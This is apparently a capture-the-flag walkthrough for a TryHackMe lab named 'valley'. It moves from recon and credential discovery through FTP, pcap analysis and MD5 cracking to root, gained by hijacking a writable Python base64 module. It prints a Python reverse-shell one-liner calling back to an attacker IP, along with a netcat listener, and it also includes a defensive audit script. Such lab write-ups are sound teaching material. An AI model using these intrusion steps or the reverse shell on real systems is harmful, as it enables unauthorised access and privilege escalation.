
valley — Writeup

Initial recon

Port scanning

Let's do an IP scan using rustscan. This revealed a few open ports and services:

rustscan -a 10.10.83.68            
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
😵 https://admin.tryhackme.com

Open 10.10.83.68:22
Open 10.10.83.68:80
Open 10.10.83.68:37370

PORT      STATE SERVICE REASON
22/tcp    open  ssh     syn-ack
80/tcp    open  http    syn-ack
37370/tcp open  unknown syn-ack

Start a directory scan using ffuf:

ffuf -u "http://10.10.83.68/FUZZ" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Let the fuzzing run and, in the meantime, do some manual recon on the web server.

Check the usual suspects:

  1. View the page source (nothing interesting in this instance)
  2. Check robots.txt -> not there :(
  3. Click some buttons to see how the site behaves and what it may reveal - nothing interesting here either

Subdomain discovery

Back to the scan and something is cooking

/gallery              (Status: 301) [Size: 312] [--> http://10.10.83.68/gallery/]
/static               (Status: 301) [Size: 311] [--> http://10.10.83.68/static/]
/pricing              (Status: 301) [Size: 312] [--> http://10.10.83.68/pricing/]

/pricing has a note.txt for us, but nothing of interest.

Nothing much, so let's resume recon and fuzz inside the /static directory:

ffuf -u "http://10.10.83.68/static/FUZZ" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Vulnerable parameter discovery

We visit /static/00 and it reveals hidden instructions: valleyDev is asking for a directory, /dev1243224123123, to be removed. Let's check it out. Visiting that directory gives us a login form. Viewing the page source shows a script loaded by the form; open the script and we get some information:

    if (username === "siemDev" && password === "california") {
        window.location.href = "/dev1243224123123/devNotes37370.txt";
    } else {
        loginErrorMsg.style.opacity = 1;
    }
}

At http://10.10.83.68/dev1243224123123/devNotes37370.txt we see that it is just instructions for an FTP server. The credentials are in the script at http://10.10.83.68/dev1243224123123/dev.js.

FTP access and file discovery

In the terminal, let's access the FTP server:

ftp siemDev@10.10.83.68 37370
We specify port 37370 because the file name devNotes37370.txt gives us the clue: "37370".

Run ls and we see some files. We can't do much with them here, so fetch them to the local machine:

ftp siemDev@10.10.83.68 37370
Connected to 10.10.83.68.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||16001|)
150 Here comes the directory listing.
-rw-rw-r--    1 1000     1000         7272 Mar 06 13:55 siemFTP.pcapng
-rw-rw-r--    1 1000     1000      1978716 Mar 06 13:55 siemHTTP1.pcapng
-rw-rw-r--    1 1000     1000      1972448 Mar 06 14:06 siemHTTP2.pcapng
226 Directory send OK.
ftp>mget *.pcapng

Wireshark

These are packet captures. Fire up Wireshark and open the HTTP capture:

$ wireshark siemHTTP2.pcapng

Filter for http packets and follow the HTTP stream; someone just handed us a username and password:

uname=valleyDev&psw=ph0t0s1234&remember=onHTTP/1.1 200 OK

Looks like we can try these credentials against the server over SSH:

ssh valleyDev@10.10.83.68

We are in. An ls shows the user.txt file:

valleyDev@valley:~$ cat user.txt 
THM{********}

But that is all we can see as this user with these privileges. Let's find a way to change that :)

Change to the parent directory (/home) and check the files there:

cd ..
ls -la

Hash capturing

There is an interesting file, valleyAuthenticator. Fetch it to our local machine by starting a Python HTTP server on the target:

python3 -m http.server 1234

On the local machine:

wget http://10.10.83.68:1234/valleyAuthenticator

Check the printable strings in the file:

strings valleyAuthenticator

At the end there is "UPX!", so what does this mean? UPX (Ultimate Packer for Executables) is a popular open-source executable packer; the binary is compressed, so we just decompress it:

upx -d valleyAuthenticator

Hash cracking

Inspect the strings again and we see something interesting: there appear to be two hash-like strings embedded in the binary:

e6722920bab2326f8217e4bf6b1b58ac
dd2921cc76ee3abfd2beb60709056cfb

Copy them into a file (these are the hashes for my instance) and use hash-identifier or an online tool to check which hash type is used:

$ hash-identifier
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------

 Not Found.
--------------------------------------------------
 HASH: e6722920bab2326f8217e4bf6b1b58ac
dd2921cc76ee3abfd2beb60709056cfb
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

hash-identifier suggests MD5. Let's crack the hash with John the Ripper:

john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt hash

We get the credentials valley:liberty123. We are sudo but not there yet: we still can't access root's files, so we need to find escalation points. Get pspy from https://github.com/DominicBreuker/pspy/releases (for my machine I use pspy64), download it to your machine, and serve it with a Python HTTP server from the directory where you downloaded it:

python -m http.server 1234

On the target machine:

wget http://10.9.5.186:1234/pspy64

Stop the Python server, then make the file executable:

chmod +x pspy64

Execute it:

./pspy64

and we see some interesting stuff.

Privesc

pspy shows a script being executed, and its source imports the base64 module:

python3 /photos/script/photosEncrypt.py 
$ cat /photos/script/photosEncrypt.py
#!/usr/bin/python3
import base64

Find the base64.py module file:

find / -type f -name "base64.py" 2>/dev/null

We get something interesting: /usr/lib/python3.8/base64.py. Since the script imports this module, let's modify it to get a shell:

nano /usr/lib/python3.8/base64.py
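The root cause of this privesc is a standard-library module that an unprivileged user could edit. The following is an added example (not code from the original writeup or the room): a defender's audit that walks every directory a given script would import from and reports modules or package directories writable by group or others. It assumes it runs with the same interpreter as the cron job; the default script path is the one from the page.

```python
#!/usr/bin/env python3
"""Audit a Python import path for modules an unprivileged user could edit.
Added example, not from the original writeup: the privesc above works because
/usr/lib/python3.8/base64.py was writable, so a root-run `import base64`
executes whatever a local user put there."""
import os
import stat
import sys


def _writable_by_others(path):
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_import_path(dirs):
    """Return sorted (path, octal mode) pairs for .py/.pth files and
    directories under dirs that are writable by group or others."""
    findings = set()
    for base in dirs:
        if not os.path.isdir(base):
            continue
        for root, _subdirs, files in os.walk(base):
            # A writable directory is as bad as a writable module: a user can
            # drop a new base64.py there that shadows the real one.
            if _writable_by_others(root):
                findings.add((root, oct(os.stat(root).st_mode & 0o777)))
            for name in files:
                full = os.path.join(root, name)
                if not name.endswith((".py", ".pth")) or os.path.islink(full):
                    continue
                if _writable_by_others(full):
                    findings.add((full, oct(os.stat(full).st_mode & 0o777)))
    return sorted(findings)


def audit_script(script_path):
    """Audit everything `python3 script_path` would import from: the script's
    own directory comes first on sys.path, then the interpreter's search path.
    Assumes this audit runs with the same interpreter the cron job uses."""
    dirs = [os.path.dirname(os.path.abspath(script_path))]
    dirs += [d for d in sys.path if d]
    return audit_import_path(dirs)


if __name__ == "__main__":
    # Default path taken from the writeup; pass another script as argv[1].
    target = sys.argv[1] if len(sys.argv) > 1 else "/photos/script/photosEncrypt.py"
    for path, mode in audit_script(target):
        print(f"{mode} {path}")
```

Any line it prints is a file or directory that a local user can use to plant code into a privileged Python process; fixing the ownership and mode (root-owned, 0644 for modules, 0755 for directories) closes the hole.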

Getting a reverse shell

Go to the local machine and listen on the port you chose (I used 1234). Visit revshell.com to get a proper reverse shell command:

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.5.186",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")

Paste it into the Python file and save.

Reverse shell

nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.9.5.186] from (UNKNOWN) [10.10.83.68] 48880
# ls
ls
root.txt  snap
# cat root.txt
cat root.txt
THM{**********}
# 

YOU ARE ROOT!

Answer the Questions!! Happy Hacking…. :)

This post is licensed under CC BY 4.0 by the author.